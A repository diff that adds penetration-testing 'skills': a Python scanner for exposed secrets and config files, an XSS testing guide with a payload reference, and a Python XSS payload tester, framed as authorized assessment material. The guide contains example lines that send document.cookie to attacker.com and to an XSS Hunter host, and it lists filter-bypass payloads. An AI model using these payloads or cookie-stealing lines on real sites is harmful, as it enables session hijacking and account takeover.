--- a/security/skills/testing-for-sensitive-data-exposure/scripts/agent.py
+++ b/security/skills/testing-for-sensitive-data-exposure/scripts/agent.py
@@ -1,0 +1,236 @@
+#!/usr/bin/env python3
+"""Agent for testing sensitive data exposure vulnerabilities during authorized assessments."""
+
+import requests
+import re
+import json
+import argparse
+import urllib3
+from datetime import datetime
+from urllib.parse import urljoin
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+SECRET_PATTERNS = {
+    "AWS Access Key": r"AKIA[0-9A-Z]{16}",
+    "AWS Secret Key": r"(?i)aws(.{0,20})?(?-i)['\"][0-9a-zA-Z/+]{40}['\"]",
+    "Google API Key": r"AIza[0-9A-Za-z\-_]{35}",
+    "Stripe Secret": r"sk_live_[0-9a-zA-Z]{24,}",
+    "GitHub Token": r"ghp_[a-zA-Z0-9]{36}",
+    "Slack Token": r"xox[bpsa]-[0-9a-zA-Z\-]{10,}",
+    "Private Key": r"-----BEGIN (RSA |EC )?PRIVATE KEY-----",
+    "Generic Secret": r"(?i)(password|secret|api_key|apikey|token)\s*[=:]\s*['\"][^'\"]{8,}['\"]",
+}
+
+SENSITIVE_FIELDS = [
+    "password", "password_hash", "salt", "ssn", "social_security",
+    "credit_card", "card_number", "cvv", "secret_key", "api_key",
+    "private_key", "token", "access_token", "refresh_token",
+]
+
+
+def scan_javascript_files(base_url):
+    """Download and scan JavaScript files for hardcoded secrets."""
+    print("\n[*] Scanning JavaScript files for secrets...")
+    findings = []
+    try:
+        resp = requests.get(base_url, timeout=15, verify=False)
+        js_urls = re.findall(r'src=["\']([^"\']*\.js[^"\']*)["\']', resp.text)
+        for js_path in js_urls[:20]:
+            if js_path.startswith("//"):
+                js_url = "https:" + js_path
+            elif js_path.startswith("/"):
+                js_url = urljoin(base_url, js_path)
+            elif js_path.startswith("http"):
+                js_url = js_path
+            else:
+                js_url = urljoin(base_url, js_path)
+            try:
+                js_resp = requests.get(js_url, timeout=15, verify=False)
+                for name, pattern in SECRET_PATTERNS.items():
+                    matches = re.findall(pattern, js_resp.text)
+                    if matches:
+                        findings.append({
+                            "type": "SECRET_IN_JS", "file": js_url,
+                            "pattern": name, "count": len(matches), "severity": "HIGH",
+                        })
+                        print(f"  [!] {name} found in {js_path} ({len(matches)} matches)")
+            except requests.RequestException:
+                continue
+    except requests.RequestException as e:
+        print(f"  [-] Error: {e}")
+    return findings
+
+
+def check_config_files(base_url):
+    """Check for exposed configuration files."""
+    print("\n[*] Checking for exposed configuration files...")
+    findings = []
+    config_files = [
+        ".env", ".env.local", ".env.production", "config.json", "settings.json",
+        ".aws/credentials", ".docker/config.json", "wp-config.php",
+        ".git/config", ".git/HEAD", "composer.json", "package.json",
+        ".htaccess", "web.config", "phpinfo.php",
+    ]
+    for cf in config_files:
+        url = urljoin(base_url, cf)
+        try:
+            resp = requests.get(url, timeout=5, verify=False)
+            if resp.status_code == 200 and len(resp.text) > 10:
+                content_type = resp.headers.get("Content-Type", "")
+                if "text/html" not in content_type or cf.endswith((".json", ".php")):
+                    findings.append({
+                        "type": "EXPOSED_CONFIG", "file": cf, "url": url,
+                        "size": len(resp.text), "severity": "CRITICAL",
+                    })
+                    print(f"  [!] FOUND: {cf} ({len(resp.text)} bytes)")
+        except requests.RequestException:
+            continue
+    return findings
+
+
+def check_api_data_exposure(base_url, token, endpoints):
+    """Check API responses for excessive sensitive data."""
+    print("\n[*] Checking API responses for sensitive data exposure...")
+    findings = []
+    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
+    for endpoint in endpoints:
+        url = urljoin(base_url, endpoint)
+        try:
+            resp = requests.get(url, headers=headers, timeout=10, verify=False)
+            if resp.status_code == 200:
+                data_str = resp.text.lower()
+                exposed = [f for f in SENSITIVE_FIELDS if f in data_str]
+                if exposed:
+                    findings.append({
+                        "type": "API_DATA_EXPOSURE", "endpoint": endpoint,
+                        "exposed_fields": exposed, "severity": "HIGH",
+                    })
+                    print(f"  [!] {endpoint}: Exposes {exposed}")
+        except requests.RequestException:
+            continue
+    return findings
+
+
+def check_security_headers(base_url, sensitive_endpoints):
+    """Check Cache-Control and security headers on sensitive pages."""
+    print("\n[*] Checking cache headers on sensitive endpoints...")
+    findings = []
+    for endpoint in sensitive_endpoints:
+        url = urljoin(base_url, endpoint)
+        try:
+            resp = requests.get(url, timeout=10, verify=False)
+            cache_control = resp.headers.get("Cache-Control", "")
+            if "no-store" not in cache_control and resp.status_code == 200:
+                findings.append({
+                    "type": "MISSING_NO_STORE", "endpoint": endpoint,
+                    "cache_control": cache_control, "severity": "MEDIUM",
+                })
+                print(f"  [!] {endpoint}: Missing no-store (Cache-Control: {cache_control})")
+        except requests.RequestException:
+            continue
+    return findings
+
+
+def check_tls_config(host):
+    """Basic TLS configuration check."""
+    print(f"\n[*] Checking TLS on {host}...")
+    findings = []
+    try:
+        resp = requests.get(f"http://{host}/", timeout=5, allow_redirects=False, verify=False)
+        if resp.status_code not in (301, 302, 307, 308):
+            findings.append({
+                "type": "NO_HTTPS_REDIRECT", "host": host,
+                "status": resp.status_code, "severity": "HIGH",
+            })
+            print(f"  [!] HTTP does not redirect to HTTPS (status {resp.status_code})")
+        else:
+            location = resp.headers.get("Location", "")
+            if location.startswith("https://"):
+                print(f"  [+] HTTP redirects to HTTPS")
+    except requests.RequestException:
+        print(f"  [+] HTTP not accessible (HTTPS only)")
+
+    try:
+        resp = requests.get(f"https://{host}/", timeout=5, verify=False)
+        hsts = resp.headers.get("Strict-Transport-Security", "")
+        if not hsts:
+            findings.append({"type": "MISSING_HSTS", "host": host, "severity": "MEDIUM"})
+            print(f"  [!] Missing HSTS header")
+        else:
+            print(f"  [+] HSTS: {hsts}")
+    except requests.RequestException:
+        pass
+    return findings
+
+
+def check_error_verbosity(base_url):
+    """Test if error responses leak sensitive information."""
+    print("\n[*] Testing error response verbosity...")
+    findings = []
+    test_requests = [
+        {"method": "POST", "url": "/api/users", "data": '{"invalid": data'},
+        {"method": "GET", "url": "/api/nonexistent/path"},
+        {"method": "GET", "url": "/api/users/999999999"},
+    ]
+    verbose_patterns = ["traceback", "stack trace", "exception", "sql", "at line",
+                        "file \"", "internal server", "debug"]
+    for tr in test_requests:
+        url = urljoin(base_url, tr["url"])
+        try:
+            resp = requests.request(tr["method"], url, data=tr.get("data"),
+                                    timeout=10, verify=False)
+            text_lower = resp.text.lower()
+            matches = [p for p in verbose_patterns if p in text_lower]
+            if matches:
+                findings.append({
+                    "type": "VERBOSE_ERROR", "url": tr["url"],
+                    "patterns": matches, "severity": "MEDIUM",
+                })
+                print(f"  [!] {tr['url']}: Verbose error ({matches})")
+        except requests.RequestException:
+            continue
+    return findings
+
+
+def generate_report(findings, output_path):
+    """Generate sensitive data exposure report."""
+    report = {
+        "assessment_date": datetime.now().isoformat(),
+        "total_findings": len(findings),
+        "by_type": {},
+        "findings": findings,
+    }
+    for f in findings:
+        t = f.get("type", "UNKNOWN")
+        report["by_type"][t] = report["by_type"].get(t, 0) + 1
+    with open(output_path, "w") as fh:
+        json.dump(report, fh, indent=2)
+    print(f"\n[*] Report: {output_path} | Total: {len(findings)}")
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Sensitive Data Exposure Testing Agent")
+    parser.add_argument("base_url", help="Base URL of the target")
+    parser.add_argument("--token", help="Bearer token for authenticated testing")
+    parser.add_argument("--endpoints", nargs="+",
+                        default=["/api/users/me", "/api/users", "/api/account"])
+    parser.add_argument("-o", "--output", default="data_exposure_report.json")
+    args = parser.parse_args()
+
+    print(f"[*] Sensitive Data Exposure Assessment: {args.base_url}")
+    findings = []
+    findings.extend(scan_javascript_files(args.base_url))
+    findings.extend(check_config_files(args.base_url))
+    findings.extend(check_error_verbosity(args.base_url))
+    from urllib.parse import urlparse
+    host = urlparse(args.base_url).netloc
+    findings.extend(check_tls_config(host))
+    if args.token:
+        findings.extend(check_api_data_exposure(args.base_url, args.token, args.endpoints))
+        findings.extend(check_security_headers(args.base_url, args.endpoints))
+    generate_report(findings, args.output)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/testing-for-xss-vulnerabilities/SKILL.md
+++ b/security/skills/testing-for-xss-vulnerabilities/SKILL.md
@@ -1,0 +1,205 @@
+---
+name: testing-for-xss-vulnerabilities
+description: 'Tests web applications for Cross-Site Scripting (XSS) vulnerabilities
+  by injecting JavaScript payloads into reflected, stored, and DOM-based contexts
+  to demonstrate client-side code execution, session hijacking, and user impersonation.
+  The tester identifies all injection points and output contexts, crafts context-appropriate
+  payloads, and bypasses sanitization and CSP protections. Activates for requests
+  involving XSS testing, cross-site scripting assessment, client-side injection testing,
+  or JavaScript injection vulnerability testing.
+
+  '
+domain: cybersecurity
+subdomain: penetration-testing
+tags:
+- XSS
+- cross-site-scripting
+- client-side-security
+- OWASP-A03
+- JavaScript-injection
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- ID.RA-01
+- ID.RA-06
+- GV.OV-02
+- DE.AE-07
+mitre_attack:
+- T1595
+- T1190
+- T1059
+- T1078
+- T1055
+---
+# Testing for XSS Vulnerabilities
+
+## When to Use
+
+- Testing web applications for client-side injection vulnerabilities as part of OWASP WSTG testing
+- Evaluating the effectiveness of input sanitization and output encoding across all application features
+- Assessing the protection provided by Content Security Policy (CSP) headers against XSS exploitation
+- Demonstrating the impact of XSS through session hijacking, credential theft, or phishing overlay to stakeholders
+- Testing single-page applications (React, Angular, Vue) for DOM-based XSS in client-side routing and rendering
+
+**Do not use** against applications without written authorization, for deploying persistent XSS payloads that affect real users, or for exfiltrating actual user session tokens from production environments.
+
+## Prerequisites
+
+- Authorized scope defining the target web application and acceptable testing activities
+- Burp Suite Professional with XSS-focused extensions (XSS Validator, Reflector, Active Scan++)
+- Browser with developer tools and XSS testing extensions (HackBar, XSS Hunter)
+- XSS Hunter or Burp Collaborator for out-of-band payload verification
+- SecLists XSS payload lists and custom payloads for WAF bypass scenarios
+
+
+> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
+
+## Workflow
+
+### Step 1: Input and Output Mapping
+
+Map every location where user input enters and is rendered by the application:
+
+- **Reflected inputs**: Test every URL parameter, search field, error message, and HTTP header value that is reflected in the response
+- **Stored inputs**: Identify features where input is saved and displayed later: user profiles, comments, forum posts, file names, support tickets, and chat messages
+- **DOM inputs**: Identify client-side JavaScript that reads from `location.hash`, `location.search`, `document.referrer`, `window.name`, `postMessage`, or `localStorage` and writes to the DOM
+- **Output context identification**: For each reflected input, determine the rendering context:
+  - HTML body: `<div>USER_INPUT</div>`
+  - HTML attribute: `<input value="USER_INPUT">`
+  - JavaScript string: `var x = 'USER_INPUT';`
+  - URL context: `<a href="USER_INPUT">`
+  - CSS context: `<div style="color: USER_INPUT">`
+
+### Step 2: Reflected XSS Testing
+
+Test reflected injection points with context-appropriate payloads:
+
+- **HTML body context**: `<script>alert(document.domain)</script>`, `<img src=x onerror=alert(1)>`, `<svg onload=alert(1)>`
+- **HTML attribute context**: `" onfocus=alert(1) autofocus="`, `" onmouseover=alert(1) "`, `"><script>alert(1)</script>`
+- **JavaScript string context**: `';alert(1)//`, `\';alert(1)//`, `</script><script>alert(1)</script>`
+- **URL/href context**: `javascript:alert(1)`, `data:text/html,<script>alert(1)</script>`
+- **Inside HTML comments**: `--><script>alert(1)</script><!--`
+- **Filter bypass payloads** (when basic payloads are blocked):
+  - Case variation: `<ScRiPt>alert(1)</sCrIpT>`
+  - Event handlers: `<details open ontoggle=alert(1)>`
+  - SVG: `<svg><animate onbegin=alert(1) attributeName=x>`
+  - Encoding: `<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>`
+
+### Step 3: Stored XSS Testing
+
+Test persistent storage points that render input to other users:
+
+- Submit XSS payloads to every stored input field identified in Step 1
+- Use a unique identifier in each payload to track which inputs trigger: `<script>alert('XSS-PROFILE-001')</script>`
+- Check all locations where the stored input is rendered (the same input may appear on multiple pages)
+- Test file upload features with HTML files containing JavaScript, SVG files with embedded scripts, and filenames containing XSS payloads
+- Test rich text editors by injecting payloads through the raw HTML mode or by manipulating the POST data after the client-side editor sanitizes
+- Use XSS Hunter payloads (`"><script src=https://yourxsshunter.xss.ht></script>`) for blind stored XSS where the payload fires in an admin panel or internal tool you cannot directly access
+
+### Step 4: DOM-Based XSS Testing
+
+Analyze client-side JavaScript for unsafe DOM manipulation:
+
+- **Source identification**: Search JavaScript for dangerous sources that read attacker-controlled input:
+  - `document.location`, `document.URL`, `document.referrer`
+  - `location.hash`, `location.search`, `location.href`
+  - `window.name`, `postMessage` event data
+- **Sink identification**: Search for dangerous sinks that write to the DOM:
+  - `innerHTML`, `outerHTML`, `document.write()`, `document.writeln()`
+  - `eval()`, `setTimeout()`, `setInterval()`, `Function()`
+  - `element.setAttribute()` with event handlers, `jQuery.html()`, `.append()`, `v-html` (Vue), `dangerouslySetInnerHTML` (React)
+- **Trace data flow**: Follow the path from source to sink. If user-controlled input reaches a dangerous sink without proper sanitization, DOM XSS exists.
+- **Framework-specific testing**: Test React `dangerouslySetInnerHTML`, Angular template injection (`{{constructor.constructor('alert(1)')()}}`), Vue `v-html` directive
+
+### Step 5: CSP Bypass and Advanced Exploitation
+
+Test Content Security Policy effectiveness and demonstrate real-world impact:
+
+- **CSP analysis**: Review the CSP header for weaknesses:
+  - `unsafe-inline` in script-src allows inline scripts
+  - `unsafe-eval` allows eval() and similar functions
+  - Wildcard domains (`*.googleapis.com`) may host JSONP endpoints usable for CSP bypass
+  - `base-uri` not set allows `<base>` tag injection to redirect relative script loads
+- **JSONP bypass**: If CSP allows a domain with JSONP endpoints, use `<script src="https://allowed-domain.com/jsonp?callback=alert(1)"></script>`
+- **Impact demonstration**:
+  - Session hijacking: `<script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>`
+  - Credential phishing: Inject a fake login form overlay that submits to the attacker's server
+  - Keylogging: Inject JavaScript that captures keystrokes on the page
+  - Account takeover: Use XSS to change the victim's email address and trigger a password reset
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| **Reflected XSS** | Non-persistent XSS where the injected payload is included in the server's response to the same request, requiring the victim to click a crafted URL |
+| **Stored XSS** | Persistent XSS where the payload is saved on the server and served to other users who view the affected page |
+| **DOM-Based XSS** | XSS that occurs entirely in the browser when client-side JavaScript reads attacker-controlled data and writes it to a dangerous DOM sink |
+| **Content Security Policy** | HTTP response header that restricts which sources the browser can load scripts, styles, and other resources from, providing defense-in-depth against XSS |
+| **Output Encoding** | Converting special characters to their HTML entity equivalents (e.g., `<` to `&lt;`) to prevent the browser from interpreting user input as code |
+| **Sink** | A JavaScript function or DOM property that can cause code execution or HTML rendering if attacker-controlled data reaches it unsanitized |
+
+## Tools & Systems
+
+- **Burp Suite Professional**: HTTP proxy with active scanning for reflected and stored XSS, plus Repeater and Intruder for manual payload testing
+- **XSS Hunter**: Hosted service that generates payloads which phone home with screenshots, cookies, and DOM content when triggered, essential for blind stored XSS
+- **DOMPurify**: Client-side sanitization library used by developers to prevent XSS; testers should test for bypass techniques against the deployed version
+- **Browser Developer Tools**: Console, Network, and Elements tabs for tracing DOM-based XSS data flows and testing payloads in real-time
+
+## Common Scenarios
+
+### Scenario: Stored XSS in Customer Support Ticket System
+
+**Context**: An e-commerce platform has a customer support system where customers submit tickets that are viewed by support agents in an internal admin panel. The ticket submission form accepts HTML formatting.
+
+**Approach**:
+1. Submit a support ticket with a unique XSS Hunter payload in the ticket description
+2. The payload fires when a support agent views the ticket in the admin panel, sending a callback with the agent's session cookie, page DOM, and screenshot
+3. Use the captured admin session cookie to access the admin panel as the support agent
+4. From the admin panel, access customer records, order data, and refund functionality
+5. Document the attack chain: customer submits ticket -> agent views ticket -> XSS fires -> session stolen -> admin panel compromised
+6. Test if CSP would have prevented the attack (in this case, no CSP header was present)
+
+**Pitfalls**:
+- Only testing for `<script>alert(1)</script>` and missing XSS that fires through event handlers or in non-HTML contexts
+- Not testing stored XSS in features that render to administrative users (support tickets, user profiles viewed by admins)
+- Ignoring DOM-based XSS in single-page applications where the server-side code is secure but client-side rendering is vulnerable
+- Not checking for XSS in HTTP headers (Referer, User-Agent) that may be logged and rendered in admin dashboards
+
+## Output Format
+
+```
+## Finding: Stored XSS in Support Ticket Description
+
+**ID**: XSS-002
+**Severity**: High (CVSS 8.1)
+**Affected URL**: POST /api/tickets (submission), GET /admin/tickets/8847 (trigger)
+**Parameter**: description (POST body)
+**XSS Type**: Stored (persistent)
+
+**Description**:
+The support ticket description field does not sanitize HTML input before storing
+it in the database. When a support agent views the ticket in the admin panel, the
+unsanitized HTML is rendered in the agent's browser, allowing arbitrary JavaScript
+execution in the context of the admin application.
+
+**Proof of Concept**:
+Submitted ticket with payload:
+<img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">
+
+The payload fired when the agent viewed the ticket, exfiltrating the admin session
+cookie to the XSS Hunter server.
+
+**Impact**:
+An attacker can steal the session tokens of support agents and administrators,
+gaining access to the admin panel with privileges to view customer PII, process
+refunds, and modify orders. Affects all 23 support agents who view customer tickets.
+
+**Remediation**:
+1. Implement output encoding using a context-aware library (OWASP Java Encoder,
+   DOMPurify for client-side rendering)
+2. Deploy Content Security Policy header:
+   Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
+3. Set HttpOnly flag on session cookies to prevent JavaScript access
+4. Sanitize HTML input server-side using a whitelist approach (allow only safe tags)
+```

--- a/security/skills/testing-for-xss-vulnerabilities/references/api-reference.md
+++ b/security/skills/testing-for-xss-vulnerabilities/references/api-reference.md
@@ -1,0 +1,53 @@
+# API Reference: Testing for XSS Vulnerabilities
+
+## requests Library for XSS Testing
+
+### Reflection Testing
+```python
+from urllib.parse import quote
+# Inject canary to find reflection points
+resp = requests.get(f"{url}?q={canary}")
+if canary in resp.text:
+    # Input is reflected - test payloads
+    resp = requests.get(f"{url}?q={quote(payload)}")
+```
+
+## XSS Payload Categories
+| Context | Example Payload |
+|---------|----------------|
+| HTML body | `<script>alert(document.domain)</script>` |
+| HTML attribute | `" onfocus=alert(1) autofocus="` |
+| JavaScript string | `';alert(1)//` |
+| URL/href | `javascript:alert(1)` |
+| Event handler | `<img src=x onerror=alert(1)>` |
+| SVG | `<svg onload=alert(1)>` |
+| Filter bypass | `<ScRiPt>alert(1)</sCrIpT>` |
+
+## XSS Types
+| Type | Description | Persistence |
+|------|-------------|-------------|
+| Reflected | Payload in URL/request, reflected in response | Non-persistent |
+| Stored | Payload saved server-side, rendered to others | Persistent |
+| DOM-based | Payload processed by client-side JavaScript | Client-side |
+
+## CSP Analysis
+| Directive | Insecure Value | Risk |
+|-----------|---------------|------|
+| `script-src` | `'unsafe-inline'` | Allows inline `<script>` tags |
+| `script-src` | `'unsafe-eval'` | Allows `eval()` and similar |
+| `script-src` | `*.googleapis.com` | May host JSONP endpoints |
+| `base-uri` | Not set | Allows `<base>` tag injection |
+| `default-src` | `*` | Allows scripts from any origin |
+
+## Cookie Security Flags
+| Flag | Purpose |
+|------|---------|
+| `HttpOnly` | Prevents JavaScript access to cookies |
+| `Secure` | Only send over HTTPS |
+| `SameSite` | Cross-site request protection |
+
+## References
+- OWASP XSS Guide: https://owasp.org/www-community/attacks/xss/
+- XSS Filter Evasion: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
+- CSP Evaluator: https://csp-evaluator.withgoogle.com/
+- PortSwigger XSS: https://portswigger.net/web-security/cross-site-scripting

--- a/security/skills/testing-for-xss-vulnerabilities/scripts/agent.py
+++ b/security/skills/testing-for-xss-vulnerabilities/scripts/agent.py
@@ -1,0 +1,206 @@
+#!/usr/bin/env python3
+"""Agent for testing Cross-Site Scripting (XSS) vulnerabilities during authorized assessments."""
+
+import requests
+import json
+import argparse
+import urllib3
+from datetime import datetime
+from urllib.parse import urljoin, quote
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+XSS_PAYLOADS = {
+    "html_body": [
+        '<script>alert(document.domain)</script>',
+        '<img src=x onerror=alert(1)>',
+        '<svg onload=alert(1)>',
+        '<details open ontoggle=alert(1)>',
+        '<body onload=alert(1)>',
+    ],
+    "html_attribute": [
+        '" onfocus=alert(1) autofocus="',
+        '" onmouseover=alert(1) "',
+        '"><script>alert(1)</script>',
+        "' onfocus=alert(1) autofocus='",
+    ],
+    "javascript_context": [
+        "';alert(1)//",
+        "\\';alert(1)//",
+        "</script><script>alert(1)</script>",
+    ],
+    "filter_bypass": [
+        '<ScRiPt>alert(1)</sCrIpT>',
+        '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>',
+        '<svg/onload=alert(1)>',
+        '<input onfocus=alert(1) autofocus>',
+    ],
+}
+
+CANARY = "xsscanary7391"
+
+
+def detect_reflection_context(response_text, canary):
+    """Determine the rendering context of reflected input."""
+    contexts = []
+    if f">{canary}<" in response_text or f">{canary} " in response_text:
+        contexts.append("html_body")
+    if f'="{canary}"' in response_text or f"='{canary}'" in response_text:
+        contexts.append("html_attribute")
+    if f"'{canary}'" in response_text or f'"{canary}"' in response_text:
+        if "<script>" in response_text.lower():
+            contexts.append("javascript_context")
+    if f'href="{canary}' in response_text or f"href='{canary}" in response_text:
+        contexts.append("url_context")
+    return contexts if contexts else ["html_body"]
+
+
+def test_reflected_xss(base_url, params, token=None):
+    """Test URL parameters for reflected XSS."""
+    print("\n[*] Testing reflected XSS...")
+    findings = []
+    headers = {}
+    if token:
+        headers["Authorization"] = f"Bearer {token}"
+
+    for param_url in params:
+        url = urljoin(base_url, param_url)
+        canary_url = url.replace("FUZZ", CANARY)
+        try:
+            resp = requests.get(canary_url, headers=headers, timeout=10, verify=False)
+            if CANARY not in resp.text:
+                continue
+            contexts = detect_reflection_context(resp.text, CANARY)
+            print(f"  [+] Reflection found at {param_url} (contexts: {contexts})")
+            char_test_url = url.replace("FUZZ", '<>"\'&/')
+            char_resp = requests.get(char_test_url, headers=headers, timeout=10, verify=False)
+            unencoded = []
+            for ch in ['<', '>', '"', "'", '/']:
+                if ch in char_resp.text and f"&{ch}" not in char_resp.text:
+                    unencoded.append(ch)
+
+            for context in contexts:
+                payloads = XSS_PAYLOADS.get(context, XSS_PAYLOADS["html_body"])
+                for payload in payloads:
+                    test_url = url.replace("FUZZ", quote(payload))
+                    try:
+                        test_resp = requests.get(test_url, headers=headers, timeout=10, verify=False)
+                        if payload in test_resp.text or payload.lower() in test_resp.text.lower():
+                            findings.append({
+                                "type": "REFLECTED_XSS", "url": param_url,
+                                "payload": payload, "context": context,
+                                "severity": "HIGH",
+                            })
+                            print(f"  [!] XSS CONFIRMED: {param_url} | payload: {payload[:50]}")
+                            break
+                    except requests.RequestException:
+                        continue
+        except requests.RequestException:
+            continue
+    return findings
+
+
+def test_stored_xss(base_url, submit_endpoint, display_endpoint, token, field="body"):
+    """Test stored XSS via form submission."""
+    print(f"\n[*] Testing stored XSS on {submit_endpoint}...")
+    findings = []
+    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
+    submit_url = urljoin(base_url, submit_endpoint)
+    display_url = urljoin(base_url, display_endpoint)
+
+    for payload_type, payloads in XSS_PAYLOADS.items():
+        for payload in payloads[:2]:
+            marker = f"XSS-{payload_type}-{hash(payload) % 10000}"
+            tagged_payload = f"{marker}:{payload}"
+            try:
+                resp = requests.post(submit_url, headers=headers,
+                                     json={field: tagged_payload}, timeout=10, verify=False)
+                if resp.status_code in (200, 201):
+                    display_resp = requests.get(display_url, headers=headers,
+                                                timeout=10, verify=False)
+                    if payload in display_resp.text:
+                        findings.append({
+                            "type": "STORED_XSS", "submit": submit_endpoint,
+                            "display": display_endpoint, "payload": payload,
+                            "severity": "CRITICAL",
+                        })
+                        print(f"  [!] STORED XSS: {payload[:50]}")
+                        break
+            except requests.RequestException:
+                continue
+    return findings
+
+
+def check_csp_header(base_url):
+    """Analyze Content Security Policy header for XSS protection."""
+    print(f"\n[*] Checking CSP header on {base_url}...")
+    findings = []
+    try:
+        resp = requests.get(base_url, timeout=10, verify=False)
+        csp = resp.headers.get("Content-Security-Policy", "")
+        xxp = resp.headers.get("X-XSS-Protection", "")
+
+        if not csp:
+            findings.append({"type": "NO_CSP", "severity": "MEDIUM"})
+            print("  [!] No Content-Security-Policy header")
+        else:
+            print(f"  [+] CSP: {csp[:100]}...")
+            if "unsafe-inline" in csp:
+                findings.append({"type": "CSP_UNSAFE_INLINE", "severity": "HIGH"})
+                print("  [!] CSP allows 'unsafe-inline'")
+            if "unsafe-eval" in csp:
+                findings.append({"type": "CSP_UNSAFE_EVAL", "severity": "HIGH"})
+                print("  [!] CSP allows 'unsafe-eval'")
+            if "*" in csp:
+                findings.append({"type": "CSP_WILDCARD", "severity": "MEDIUM"})
+                print("  [!] CSP contains wildcard domains")
+
+        if not xxp:
+            print("  [INFO] No X-XSS-Protection header (deprecated)")
+        cookie_headers = resp.headers.get("Set-Cookie", "")
+        if cookie_headers and "httponly" not in cookie_headers.lower():
+            findings.append({"type": "COOKIE_NO_HTTPONLY", "severity": "MEDIUM"})
+            print("  [!] Session cookie missing HttpOnly flag")
+    except requests.RequestException as e:
+        print(f"  [-] Error: {e}")
+    return findings
+
+
+def generate_report(findings, output_path):
+    """Generate XSS assessment report."""
+    report = {
+        "assessment_date": datetime.now().isoformat(),
+        "total_findings": len(findings),
+        "by_type": {},
+        "findings": findings,
+    }
+    for f in findings:
+        t = f.get("type", "UNKNOWN")
+        report["by_type"][t] = report["by_type"].get(t, 0) + 1
+    with open(output_path, "w") as fh:
+        json.dump(report, fh, indent=2)
+    print(f"\n[*] Report: {output_path} | Findings: {len(findings)}")
+
+
+def main():
+    parser = argparse.ArgumentParser(description="XSS Vulnerability Testing Agent")
+    parser.add_argument("base_url", help="Base URL of the target")
+    parser.add_argument("--token", help="Bearer token for authenticated testing")
+    parser.add_argument("--params", nargs="+", default=["/search?q=FUZZ", "/page?name=FUZZ"])
+    parser.add_argument("--submit-endpoint", help="Endpoint to submit stored XSS")
+    parser.add_argument("--display-endpoint", help="Endpoint where stored input is displayed")
+    parser.add_argument("-o", "--output", default="xss_report.json")
+    args = parser.parse_args()
+
+    print(f"[*] XSS Vulnerability Assessment: {args.base_url}")
+    findings = []
+    findings.extend(check_csp_header(args.base_url))
+    findings.extend(test_reflected_xss(args.base_url, args.params, args.token))
+    if args.submit_endpoint and args.display_endpoint:
+        findings.extend(test_stored_xss(args.base_url, args.submit_endpoint,
+                                         args.display_endpoint, args.token))
+    generate_report(findings, args.output)
+
+
+if __name__ == "__main__":
+    main()

--- a/website/docs/how-to/security-testing.md
+++ b/website/docs/how-to/security-testing.md
@@ -21,10 +21,18 @@ pack (Claude Code "skills"). Install it with:
 npx skills add mukul975/Anthropic-Cybersecurity-Skills
 ```
 
-It is a large, single-author pack (750+ skills). Review a skill's `SKILL.md`
-and `scripts/` before running it, and install only what you need. The skills
-that map to DataCollect's stack (TypeScript, Express + PostgreSQL, Vue, JWT,
-multi-tenant, Docker, GitHub Actions) are:
+It is a large, single-author pack (750+ skills) and is **not affiliated with
+Anthropic** despite the name — treat it as untrusted third-party content. Review
+a skill's `SKILL.md` and `scripts/` before running it, and install only what you
+need.
+
+To avoid depending on the upstream pull, the curated subset below is also
+**vendored in this repository** under
+[`security/skills/`](https://github.com/idpass/idpass-data-collect/tree/develop/security/skills)
+(pinned to a specific upstream commit, Apache-2.0). See its `README.md` for how
+to activate a skill in Claude Code. The skills that map to DataCollect's stack
+(TypeScript, Express + PostgreSQL, Vue, JWT, multi-tenant, Docker, GitHub
+Actions) are:
 
 **Web application security**
 - `exploiting-sql-injection-vulnerabilities`, `performing-second-order-sql-injection` — the backend uses raw SQL in its stores.

--- a/website/docs/how-to/security-testing.md
+++ b/website/docs/how-to/security-testing.md
@@ -1,0 +1,150 @@
+# How to Re-run the Security Testing
+
+This guide lets any developer reproduce the security assessment that was run
+against DataCollect: the live API attack probes, the durable regression tests
+they became, and the static scanners. It also lists the third-party
+cybersecurity "skills" the assessment drew on and how to install them.
+
+:::warning Authorized targets only
+Only run the offensive probes and scanners against an instance you own or are
+explicitly authorized to test — a local stack or your own staging. Never point
+them at another party's deployment.
+:::
+
+## The skills pack
+
+The assessment used the community
+[Anthropic-Cybersecurity-Skills](https://github.com/mukul975/Anthropic-Cybersecurity-Skills)
+pack (Claude Code "skills"). Install it with:
+
+```bash
+npx skills add mukul975/Anthropic-Cybersecurity-Skills
+```
+
+It is a large, single-author pack (750+ skills). Review a skill's `SKILL.md`
+and `scripts/` before running it, and install only what you need. The skills
+that map to DataCollect's stack (TypeScript, Express + PostgreSQL, Vue, JWT,
+multi-tenant, Docker, GitHub Actions) are:
+
+**Web application security**
+- `exploiting-sql-injection-vulnerabilities`, `performing-second-order-sql-injection` — the backend uses raw SQL in its stores.
+- `performing-ssrf-vulnerability-exploitation`, `performing-blind-ssrf-exploitation` — external sync fetches configured URLs.
+- `testing-for-xss-vulnerabilities` — the Vue admin/web UIs.
+- `testing-for-sensitive-data-exposure`, `performing-security-headers-audit`.
+
+**API security**
+- `testing-api-for-broken-object-level-authorization` — multi-tenant IDOR is the top risk.
+- `testing-for-json-web-token-vulnerabilities`, `performing-jwt-none-algorithm-attack`, `exploiting-jwt-algorithm-confusion-attack` — JWT auth.
+- `testing-api-for-mass-assignment-vulnerability`, `exploiting-excessive-data-exposure-in-api`.
+- `performing-api-rate-limiting-bypass`, `detecting-api-enumeration-attacks`.
+
+**Identity & access management**
+- `testing-for-broken-access-control`, `exploiting-broken-function-level-authorization`, `bypassing-authentication-with-forced-browsing`.
+
+**DevSecOps**
+- `securing-github-actions-workflows`, `detecting-supply-chain-attacks-in-ci-cd`.
